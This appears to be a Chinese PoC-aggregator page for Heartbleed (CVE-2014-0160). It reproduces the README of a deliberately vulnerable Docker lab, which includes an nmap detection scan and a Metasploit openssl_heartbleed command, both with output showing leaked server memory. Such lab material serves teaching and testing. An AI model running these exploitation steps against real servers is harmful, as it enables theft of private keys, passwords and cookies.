关联漏洞
标题:
OpenSSL 缓冲区错误漏洞
(CVE-2014-0160)
描述:OpenSSL是OpenSSL团队开发的一个开源的能够实现安全套接层(SSL v2/v3)和安全传输层(TLS v1)协议的通用加密库,它支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 OpenSSL的TLS和DTLS实现过程中的d1_both.c和t1_lib.c文件中存在安全漏洞,该漏洞源于当处理Heartbeat Extension数据包时,缺少边界检查。远程攻击者可借助特制的数据包利用该漏洞读取服务器内存中的敏感信息(如用户名、密码、Cookie、私钥等)。以下版本的OpenSSL受到
描述
Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed
介绍
# Vulnerability as a Service - CVE 2014-0160
A Debian (Wheezy) Linux system with a vulnerable version of libssl and openssl and a web server to showcase CVS-2014-0160, a.k.a. Heartbleed.
# Overview
This docker container is based on Debian Jessie and has been modified to use a vulernable version of libssl and openssl.
A simple static web page is served via Apache 2.
# Usage
Install the container with `docker pull hmlio/vaas-cve-2014-0160`
Run the container with a port mapping `docker run -d -p 8443:443 hmlio/vaas-cve-2014-0160`
You should be able to access the web application at http://your-ip:8443/.
# Checking
The web server/vulnerable openssl/libssl version can be verified and exploited as shown below (using a Kali machine is recommended):</br>
``` sh
root@kali:~/vaas-cve-2014-0160# nmap -sV -p 8443 --script=ssl-heartbleed your-ip
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-26 17:31 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000068s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE VERSION
8443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.10 (Debian)
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| http://cvedetails.com/cve/2014-0160/
|_ http://www.openssl.org/news/secadv_20140407.txt
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.61 seconds
```
# Exploitation
``` sh
Using msfcli from the Metasploit framework:
root@kali:/tmp# msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=your-ip RPORT=8443 VERBOSE=true E
...
...
[*] 192.168.179.230:8443 - Sending Heartbeat...
[*] 192.168.179.230:8443 - Heartbeat response, 65535 bytes
[+] 192.168.179.230:8443 - Heartbeat response with leak
[*] 192.168.179.230:8443 - Printable info leaked: U`tcz~8}"V2|vf3<tf"!98532ED/A/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip
```
文件快照
[4.0K] /data/pocs/a5c418f0cc137aa0df98bc26a0377a43aae76e53
├── [1.4K] Dockerfile
├── [ 591] index.html
├── [ 18K] LICENSE.md
└── [2.7K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。